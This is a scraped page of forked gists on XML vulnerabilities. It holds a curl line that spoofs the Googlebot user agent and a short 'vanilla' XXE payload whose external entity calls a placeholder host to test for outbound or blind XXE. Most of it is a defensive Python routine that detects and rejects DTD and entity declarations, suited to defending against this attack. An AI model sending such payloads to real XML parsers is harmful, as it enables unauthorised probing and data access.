curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v "$@"
calyeo / XXE_payloads
Created July 4, 2022 12:56 — forked from mgeeky/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
calyeo / xml-attacks.md
Created July 4, 2022 12:55 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker could abuse XML features to carry out denial-of-service attacks, access local files, generate network connections to other machines, or circumvent firewalls.

A penetration tester running XML tests against an application has to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.
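Seen from the defending side, the same question is whether a service's parser accepts DTD features at all. The following is an added example, not code from the gist: it uses Python's standard `xml.parsers.expat` handlers to report any DOCTYPE or entity declaration in a document without resolving it, and refuses such input before normal parsing. The names `audit_xml`, `load_untrusted` and `ForbiddenXML` are hypothetical; the sample document is the "vanilla" one shown on this page.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

# The "vanilla" document from this page; x.x.x.x is the page's own placeholder.
VANILLA_XXE = (
    b'<?xml version="1.0" ?>\n'
    b'<!DOCTYPE r [\n'
    b'<!ELEMENT r ANY >\n'
    b'<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">\n'
    b']>\n'
    b'<r>&sp;</r>'
)

class ForbiddenXML(ValueError):
    """Untrusted XML used a DTD feature this service does not accept."""

def audit_xml(data):
    """List DTD features declared or used in data; nothing is fetched."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "external-entity" if (sysid or pubid) else "internal-entity"
        findings.append((kind, name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        findings.append(("external-ref", sysid))
        return 1  # non-zero: keep parsing, the reference is not resolved

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return findings

def load_untrusted(data):
    """Parse data only if it carries no DOCTYPE or entity declarations."""
    findings = audit_xml(data)
    if findings:
        raise ForbiddenXML(findings)
    return ET.fromstring(data)

if __name__ == "__main__":
    print(audit_xml(VANILLA_XXE))
```

Rejecting every DOCTYPE is stricter than many formats require; a service that legitimately needs internal entities would filter on the `external-entity` and `external-ref` findings only.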